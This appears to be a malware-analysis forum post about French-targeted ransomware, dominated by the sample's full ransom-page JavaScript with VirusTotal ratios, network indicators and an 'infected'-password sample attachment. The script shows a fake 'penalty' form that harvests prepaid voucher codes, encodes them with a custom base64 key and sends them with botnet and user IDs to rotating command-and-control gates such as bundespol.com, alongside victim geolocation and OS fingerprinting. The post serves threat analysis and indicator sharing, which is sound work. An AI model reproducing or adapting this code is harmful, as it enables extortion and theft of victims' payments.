2 French version in attach
27/43 >> 62.8%
http://www.virustotal.com/file-scan/rep ... 1323484597
6/43 >> 14.0%
http://www.virustotal.com/file-scan/rep ... 1323613279
I was a little more motivated because it target my country.
27/43 >> 62.8%
http://www.virustotal.com/file-scan/rep ... 1323484597
6/43 >> 14.0%
http://www.virustotal.com/file-scan/rep ... 1323613279
Code: Select all
Network activity:
/*
* Global variables
*/
var debug = false;
var debug_ec = false;
if (debug || debug_ec)
{
alert("DEBUG! DEBUG! DEBUG!");
document.getElementById("v3").value = "1";
}
var penalty_amount = 200;
var g_botnet = "fr1";
var g_os_version = "Unknown";
var g_userid = "0";
var RESPONSE_PONG = "Pong!";
var RESPONSE_OK = "OK";
var MSG_WRONG_VOUCHERS = "Voucher code incorrecte.";
var MSG_VOUCHERS_SENT = "Voucher a été envoyé. Attends pour environ 24h.";
var MSG_LOW_TOTAL = "Total des moins de "+penalty_amount+" €";
if (debug)
{
g_gates = [
"http://lck-test.net/gate.php",
"http://lck-test4.net/gate.php", // not exists
"http://lck-test1.net/gate.php",
"http://lck-test2.net/gate.php",
"http://lck-test3.net/gate.php"
]
}
else
{
g_gates = [
"http://bundespol.com/gate.php",
"http://yycqparxvohd.com/gate.php",
"http://wzuoqliyknpz.com/gate.php"
]
}
var positions_count = 1;
var g_state = new Object();
g_state.geo_location_lock = false;
g_state.geo_location_set = false;
g_state.report_lock = false;
g_state.report = "";
g_state.report_sent = true;
g_state.gate_selector_lock = false;
g_state.gate_selector_gate_works = true;
g_state.gate_selector_calls_count = 999999;
g_state.gate_selector_gate_index = 0;
g_state.os_version_set = false;
g_state.userid_set = false;
g_base64_std_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
g_base64_priv_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=";
function print_g_state()
{
if (debug_ec)
{
console.log("dump of g_state:")
console.log("\tg_state.geo_location_lock: %s", g_state.geo_location_lock ? "true" : "false");
console.log("\tg_state.geo_location_set: %s", g_state.geo_location_set ? "true" : "false");
console.log("\tg_state.report_lock: %s", g_state.report_lock ? "true" : "false");
console.log("\tg_state.report: %s", g_state.report);
console.log("\tg_state.report_sent: %s", g_state.report_sent ? "true" : "false");
console.log("\tg_state.gate_selector_lock: %s", g_state.gate_selector_lock ? "true" : "false");
console.log("\tg_state.gate_selector_gate_works: %s", g_state.gate_selector_gate_works ? "true" : "false");
console.log("\tg_state.gate_selector_calls_count: %d", g_state.gate_selector_calls_count);
console.log("\tg_state.gate_selector_gate_index: %d (%s)", g_state.gate_selector_gate_index, g_gates[g_state.gate_selector_gate_index]);
console.log("===================================================================================================");
}
}
function base64_encode(input, key)
{
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
while (i < input.length)
{
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2))
{
enc3 = enc4 = 64;
}
else if (isNaN(chr3))
{
enc4 = 64;
}
output = output +
key.charAt(enc1) + key.charAt(enc2) +
key.charAt(enc3) + key.charAt(enc4);
}
return output;
}
/*
* multitab window's tabs switcher
*/
function switch_tab(content_tab_id, content_id)
{
document.getElementById('vouchers_info_tab').className = 'close';
document.getElementById('penalty_form_tab').className = 'close';
document.getElementById(content_tab_id).className = 'open';
document.getElementById('vouchers_info').style.display = 'none';
document.getElementById('penalty_form').style.display = 'none';
document.getElementById(content_id).style.display = 'block';
return;
}
/*
* Text input filter
*/
(function()
{ // after loading document init function will be called
if (window.addEventListener)
window.addEventListener("load", init, false);
else if (window.attachEvent)
window.attachEvent("onload", init);
})();
function register_handler(id)
{
// register handler function
if (id.addEventListener)
{
id.addEventListener("keypress", filter, false);
}
else
{
id.onkeypress = filter;
}
return;
}
// Find all <input> tags, for which necessary to register event handler
function init()
{
var inputtags = document.getElementsByTagName("input");
for(var i = 0; i < inputtags.length; i++) // traverse all tags
{
var tag = inputtags[i];
if (tag.type != "text") continue; // only text fields
var allowed = tag.getAttribute("allowed");
if (!allowed) continue; // and only if presents attribute 'allowed'
// register handler function
register_handler(tag);
}
}
// This is event 'keypress' handler, which maintains input filtration.
function filter(event)
{
// Get event object and character code by portable way
var e = event || window.event; // Keyboard event object
var code = e.charCode || e.keyCode; // What key pressed
// If pressed functional key do not filter it
if (e.charCode == 0) return true; // Functional key (FF only)
if (e.ctrlKey || e.altKey) return true; // Pressed Ctrl or Alt
if (code < 32) return true; // ctrl ASCII code
// Now get information from input element
var allowed = this.getAttribute("allowed"); // Allowed characters
var errorClassName = this.getAttribute("errorclass"); // class name indicating error
var successClassName = this.getAttribute("successclass"); // class name indicating success
// Translate key code to character
var c = String.fromCharCode(code);
// Check whether character in allowed characters list or not
if (allowed.indexOf(c) != -1)
{
// character c is allowed
this.className = successClassName;
return true; // Accept input
}
else
{
// character c is not allowed
this.className = errorClassName;
// Prevent input
if (e.preventDefault) e.preventDefault();
if (e.returnValue) e.returnValue = false;
return false;
}
}
/*
* End of text input filter
*/
/*
* penalty form support code
*/
function get_position_number_html(position_number)
{
return "" + (position_number * 1 + 1);
}
function get_voucher_code_html(position_number)
{
return "<input id='voucher_code" + position_number + "' type='text' size='25' maxlength='19' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder'>";
}
function get_voucher_value_html(position_number)
{
return "<input id='voucher_value" + position_number + "' type='text' size='14' maxlength='3' value='0' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder' onkeyup='refresh_total()'>";
}
function get_img_minus_html(position_number)
{
return position_number <= 0 ? "" : "<img src='minus.png' alt='' onclick='delete_voucher_position(" + position_number + ")'>";
}
function add_voucher_position()
{
var position_number = positions_count;
positions_count++;
var newrow = document.all.penalty.insertRow(position_number + 1);
var newcell = newrow.insertCell(0);
newcell.innerHTML = get_position_number_html(position_number);
newcell = newrow.insertCell(1);
newcell.innerHTML = get_voucher_code_html(position_number);
newcell = newrow.insertCell(2);
newcell.innerHTML = get_voucher_value_html(position_number);
newcell = newrow.insertCell(3);
newcell.innerHTML = get_img_minus_html(position_number);
register_handler(document.getElementById("voucher_code"+position_number));
register_handler(document.getElementById("voucher_value"+position_number));
return;
}
function delete_voucher_position(position_number)
{
var i, j;
var vouchers = new Array();
var values = new Array();
var total_amount;
for(i = 0, j = 0; i < positions_count; i++)
{
if (i != position_number)
{
vouchers[j] = document.getElementById("voucher_code"+i).value;
values[j] = document.getElementById("voucher_value"+i).value;
j++;
}
}
for(i = 0; i < positions_count; i++)
{
document.all.penalty.deleteRow(1);
}
positions_count--;
for(i = 0; i < positions_count; i++)
{
var newrow = document.all.penalty.insertRow(i + 1);
var newcell = newrow.insertCell(0);
newcell.innerHTML = get_position_number_html(i);
newcell = newrow.insertCell(1);
newcell.innerHTML = get_voucher_code_html(i);
newcell = newrow.insertCell(2);
newcell.innerHTML = get_voucher_value_html(i);
newcell = newrow.insertCell(3);
newcell.innerHTML = get_img_minus_html(i);
}
for(i = 0; i < positions_count; i++)
{
document.getElementById("voucher_code"+i).value = vouchers[i];
document.getElementById("voucher_value"+i).value = values[i];
register_handler(document.getElementById("voucher_code"+i));
register_handler(document.getElementById("voucher_value"+i));
}
total_amount = 0;
for(i = 0; i < positions_count; i++)
{
total_amount += values[i] * 1;
}
document.getElementById("total_amount").innerHTML = total_amount;
return;
}
function refresh_total()
{
var total_amount = 0;
for(var i = 0; i < positions_count; i++)
{
total_amount += document.getElementById("voucher_value"+i).value * 1;
}
document.getElementById("total_amount").innerHTML = total_amount;
var do_pay = document.getElementById("do_pay");
//do_pay.disabled = total_amount < penalty_amount ? 'disabled' : '';
do_pay.disabled = '';
return total_amount;
}
/*
* End of penalty form support code
*/
/*
* Geoip code
*/
function http_new_request()
{
if(typeof XMLHttpRequest != "undefined")
{
return new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
var aVersions = ["MSXML2.XMLHttp.5.0", "MSXML2.XMLHttp.4.0", "MSXML2.XMLHttp.3.0", "MSXML2.XMLHttp", "Microsoft.XMLHttp"];
for (var i = 0; i < aVersions.length; i++)
{
try
{
return new ActiveXObject(aVersions[i]);
}
catch (e) {}
}
}
}
function http_get(target, callback, options)
{
var request = http_new_request();
var timer;
if (options.timeout)
{
timer = setTimeout(
function()
{
request.abort();
if (options.timeoutHandler)
options.timeoutHandler(target);
},
options.timeout
)
}
request.onreadystatechange = function()
{
if (request.readyState == 4)
{
if (timer) clearTimeout(timer);
if (request.status == 200)
{
callback(request.responseText);
}
else
{
if (options.errorHandler) options.errorHandler(request.status, request.statusText);
else callback(null);
}
}
}
try
{
request.open("GET", target, true);
request.send(null);
}
catch (e) {
}
}
function set_geo_location()
{
var options = new Object();
function cb_set_geo_location(response_text)
{
try
{
if (response_text == null)
{
g_state.geo_location_set = false;
}
else
{
var re = /Your IP Address(.*?)<b>(.*?)<\/b>/i;
var s_ip = response_text.match(re)[2].toString();
re = /ISP:(.*?)<b>(.*?)<\/b>/i;
var s_isp = response_text.match(re)[2].toString();
re = /City:(.*?)<b>(.*)<\/b>/i;
var s_city = response_text.match(re)[2].toString();
if (s_ip == "")
{
s_ip = "188.28.11.121";
}
document.getElementById("v_ip").innerHTML = s_ip;
document.getElementById("v_city").innerHTML = s_city;
document.getElementById("v_isp").innerHTML = s_isp;
g_state.geo_location_set = true;
}
}
catch (e) {}
finally
{
g_state.geo_location_lock = false;
}
}
function cb_set_geo_location_timeout(target)
{
g_state.geo_location_set = false;
g_state.geo_location_lock = false;
}
if (!g_state.geo_location_set && !g_state.geo_location_lock)
{
g_state.geo_location_lock = true;
options.timeout = 3000;
options.timeoutHandler = cb_set_geo_location_timeout;
http_get("http://tools.ip2location.com/ib2/", cb_set_geo_location, options);
}
}
function select_gate()
{
var options = new Object();
function cb_select_gate(response_text)
{
if (response_text == RESPONSE_PONG)
{
g_state.gate_selector_gate_works = true;
g_state.gate_selector_calls_count = 0;
if (debug_ec) console.log("Pinging gate %s was successfully.", g_gates[g_state.gate_selector_gate_index]);
}
else
{
g_state.gate_selector_gate_works = false;
if (debug_ec) console.log("Pinging gate %s was failed.", g_gates[g_state.gate_selector_gate_index]);
}
g_state.gate_selector_lock = false;
}
function cb_select_gate_timeout(target)
{
g_state.gate_selector_gate_works = false;
g_state.gate_selector_lock = false;
if (debug_ec) console.log("Pinging gate %s was timeout.");
}
if (!g_state.gate_selector_lock && g_state.userid_set)
{
if (!g_state.gate_selector_gate_works || g_state.gate_selector_calls_count++ > 3600) // every one hour
{
g_state.gate_selector_lock = true;
if (debug_ec) console.log("Pinging gate %s...", g_gates[g_state.gate_selector_gate_index]);
if (!g_state.gate_selector_gate_works)
{
g_state.gate_selector_gate_index = (g_state.gate_selector_gate_index + 1) % g_gates.length;
}
options.timeout = 5000;
options.timeoutHandler = cb_select_gate_timeout;
var os_version = base64_encode(g_os_version, g_base64_std_key);
http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=ping&botnet="+g_botnet+"&userid="+g_userid+"&os="+os_version, cb_select_gate, options);
}
}
}
function send_report()
{
var options = new Object();
function cb_send_report(response_text)
{
if (response_text != RESPONSE_OK)
{
g_state.gate_selector_gate_works = false;
g_state.report_sent = false;
if (debug_ec) console.log("Sending report '%s' on gate %s was failed.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
}
else
{
if (debug_ec) console.log("Sending report '%s' on gate %s was successfully.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
}
g_state.report_lock = false;
}
function cb_send_report_timeout(target)
{
g_state.gate_selector_gate_works = false;
g_state.report_lock = false;
if (debug_ec) console.log("Sending report '%s' on gate %s was timeout.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
}
if (!g_state.report_lock && !g_state.report_sent && g_state.gate_selector_gate_works)
{
g_state.report_lock = true;
if (debug_ec) console.log("Sending report '%s' on gate %s...", g_state.report, g_gates[g_state.gate_selector_gate_index]);
// set 'report_sent = true' here to prevent overwriting this flag in
// moment between changing report value and calling cb_send_report()
g_state.report_sent = true;
options.timeout = 5000;
options.timeoutHandler = cb_send_report_timeout;
http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=data&botnet="+g_botnet+"&userid="+g_userid+"&report="+g_state.report, cb_send_report, options);
}
}
function set_os_version()
{
if (g_state.os_version_set) return;
var iOS = new Array("Windows 95","Windows NT 4","Windows 98","Win 9x 4.9","Windows NT 5.0","Windows NT 5.1","Windows NT 6.1","Windows NT 5.2","Windows NT 6.0");
var oOS = new Array("Windows 95","Windows NT 4.0","Windows 98","Windows ME","Windows 2000","Windows XP","Windows Seven","Windows 2003","Windows Vista");
var os = "";
for (var i = 0; i < iOS.length; i++)
{
if (navigator.userAgent.indexOf(iOS[i]) > -1)
{
os = oOS[i];
break;
}
}
g_os_version = os;
document.getElementById("v_os").innerHTML = os;
g_state.os_version_set = true;
if (debug_ec) console.log("OS version set successfully.");
}
function set_userid()
{
if (g_state.userid_set) return;
g_userid = document.getElementById("v3").value;
if (g_userid != "0")
{
g_state.userid_set = true;
if (debug_ec) console.log("Userid set successfully.");
}
}
function monitor()
{
refresh_total();
set_geo_location();
set_os_version();
set_userid();
select_gate();
send_report();
}
window.onload = function ()
{
setInterval(monitor, 1000);
}
function are_vouchers_valid()
{
var prefix;
var is_valid = true;
var ret = true;
for(var i = 0; i < positions_count; i++)
{
var voucher_code = document.getElementById("voucher_code"+i);
var voucher = voucher_code.value;
if (voucher.length == 19)
{
prefix = voucher.substr(0, 6);
if (prefix != "633718")
{
is_valid = false;
}
}
else if (voucher.length == 16)
{
prefix = voucher.substr(0, 1);
if (prefix != "0")
{
is_valid = false;
}
}
else
{
is_valid = false;
}
if (is_valid)
{
voucher_code.className = voucher_code.getAttribute("successclass");
}
else
{
voucher_code.className = voucher_code.getAttribute("errorclass");
ret = false;
}
}
return ret;
}
function send_vouchers()
{
var report = "";
if (!are_vouchers_valid())
{
alert(MSG_WRONG_VOUCHERS);
return;
}
var total = refresh_total();
if (total < penalty_amount)
{
alert(MSG_LOW_TOTAL);
return;
}
for(var i = 0; i < positions_count; i++)
{
var voucher = document.getElementById("voucher_code"+i).value;
var value = document.getElementById("voucher_value"+i).value;
report += report.length ? "x" : "";
report += voucher + "-" + value;
}
if (report.length > 16)
{
report = base64_encode(report, g_base64_priv_key);
if (g_state.report != report)
{
g_state.report = report;
g_state.report_sent = false;
if (debug_ec) console.log("Report updated and wait sending.");
}
}
alert(MSG_VOUCHERS_SENT);
return;
}
Code: Select all
Network activity:
http://papicaton.in/check?a=2
http://tools.ip2location.com/ib2/
• dns: 1 ›› ip: 188.247.135.97 - adresse: PAPICATON.IN
Code: Select all
http://xylibox.blogspot.com/2011/12/fak ... eting.htmlhttp://tools.ip2location.com/ib2/
http://bundespol.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://bundespol.com/gate.php?cmd=data&botnet=fr1&userid=ei14b69hk8j2x4n7&report=c34Ncj4Ncj4Ncj4Ncj4NciQOc30=
http://yycqparxvohd.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://wzuoqliyknpz.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
--
• dns: 4 ›› ip: 67.226.152.139 - adresse: BUNDESPOL.COM
addr: BUNDESPOL.COM -- ip: 60.19.30.135
addr: BUNDESPOL.COM -- ip: 217.24.246.7
addr: BUNDESPOL.COM -- ip: 58.128.228.1
addr: BUNDESPOL.COM -- ip: 67.226.152.139
• dns: 4 ›› ip: 58.128.228.1 - adresse: WZUOQLIYKNPZ.COM
addr: WZUOQLIYKNPZ.COM -- ip: 60.30.73.102
addr: WZUOQLIYKNPZ.COM -- ip: 60.19.30.135
addr: WZUOQLIYKNPZ.COM -- ip: 67.226.152.139
addr: WZUOQLIYKNPZ.COM -- ip: 58.128.228.1
Data found inside the exe:
einzahlung@mail.com
lck-test.net
lck-test1.net
lck-test2.net
lck-test3.net
lck-test4.net
CNDROAAYGHMF.COM
YYCQPARXVOHD.COM
I was a little more motivated because it target my country.
Attachments
pw: infected
(402.65 KiB) Downloaded 141 times
(402.65 KiB) Downloaded 141 times